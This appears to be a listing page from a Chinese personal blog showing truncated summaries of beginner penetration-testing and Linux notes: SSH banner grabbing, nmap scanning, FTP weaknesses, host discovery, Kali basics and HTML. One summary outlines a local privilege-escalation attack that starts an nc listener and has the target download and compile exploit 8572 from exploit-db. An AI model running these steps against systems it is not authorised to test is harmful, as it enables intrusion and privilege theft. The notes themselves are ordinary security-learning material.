会员
周边
新闻
博问
闪存
赞助商
YouClaw
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
f1veseven
博客园
首页
新随笔
联系
订阅
管理
上一页
1
···
4
5
6
7
8
9
下一页
2020年6月24日
8572.c提权
摘要: *该操作只能在udev版本低于141下进行 udevadm --version 查看udev版本 本机操作 nc -lvp 4444 开启4444端口监听 目标机操作 wget 'http://www.exploit-db.com/download/8572' #下载8572.c文件 ggc 857
阅读全文
posted @ 2020-06-24 14:50 f1veseven
阅读(596)
评论(0)
推荐(0)
2020年6月23日
SSH的Banner信息
摘要: 弹回banner信息 nmap: nmap 192.168.1.1 -sV -p 22 netcat: nc 192.168.1.1 22 metasploit: msfconsole use auxiliary/scanner/ssh/ssh_version show options set rh
阅读全文
posted @ 2020-06-23 19:15 f1veseven
阅读(2309)
评论(0)
推荐(0)
Ubuntu安装ssh
摘要: 安装ssh服务器 终端中输入 sudo apt-get install openssh-server service ssh start service ssh status 安装ssh客户端 sudo apt-get install putty-tools Ubuntu软件中搜索putty安装 运
阅读全文
posted @ 2020-06-23 18:25 f1veseven
阅读(247)
评论(0)
推荐(0)
FTP漏洞
摘要: FTP简介 21端口C/S模式在应用层 用户:RealAdministratoranonymous传输格式:ASCii二进制采用明文传输 工具 medusa setookit arpspoof
阅读全文
posted @ 2020-06-23 13:02 f1veseven
阅读(199)
评论(0)
推荐(0)
2020年6月22日
漏洞扫描
摘要: 漏洞扫描 工具 Nmap: nmap --script vuln 192.168.1.1 -T4 Nessus:service nessusd start 开启nessus服务https://127.0.0.1:8834 进入页面后设置target开始扫描Metasploit: 21端口ftp漏洞利
阅读全文
posted @ 2020-06-22 19:06 f1veseven
阅读(153)
评论(0)
推荐(0)
端口探测
摘要: 端口范围(0-65535)2^16tcp/udp 分类 周知端口0-1023动态端口49152-65535注册端口1024-49151 探测工具 Nmap: nmap 192.168.1.1 nmap 192.168.1.1 -p 22 --script banner 返回banner nmap -
阅读全文
posted @ 2020-06-22 12:09 f1veseven
阅读(186)
评论(0)
推荐(0)
2020年6月18日
IP探测
摘要: OSI七层模型 7 应用层 6 表示层 5 会话层 4 传输层 3 网络层 2 数据链路层 1 物理层 二层发现 OSI中链路层中协议发现主机,一般是用arp协议无法通过路由发现 工具arpingnetdiscover 三层发现 OSI中网络层中的协议进行主机发现,一般是用ICMP协议会被防火墙过滤
阅读全文
posted @ 2020-06-18 00:27 f1veseven
阅读(413)
评论(0)
推荐(0)
2020年6月17日
kali linux基础命令
摘要: 更新kali apt update && apt upgrade && apt dist-upgrade 文件文件夹查看 ls -alh-a 查看所有文件和文件夹-l 详细格式查看-h 文件大小用k m为单位 文件文件夹操作 文件夹:mkdir rmdir文件:touch rm 文件文件夹的移动 m
阅读全文
posted @ 2020-06-17 01:22 f1veseven
阅读(228)
评论(0)
推荐(0)
2020年6月15日
Centos与Debian的安装命令
摘要: yum install 软件名(安装) apt-get install 软件名 (安装) Centos Debian rpm(安装.rpm的安装包) dpkg(安装.deb的安装包) yum(从yum源中安装) apt-get(从apt-get源中安装) rpm -ivh 软件名(安装) dpkg
阅读全文
posted @ 2020-06-15 11:21 f1veseven
阅读(1560)
评论(0)
推荐(0)
HTML基础
摘要: HTML(Hyper Text Markup Language)是超文本标记语言,网页访问 主体框架 <html> <head> <title>hello world</title> </head> <body> hello world </body> </html> 属性 bgcolor 背景颜色
阅读全文
posted @ 2020-06-15 00:34 f1veseven
阅读(67)
评论(0)
推荐(0)
上一页
1
···
4
5
6
7
8
9
下一页
公告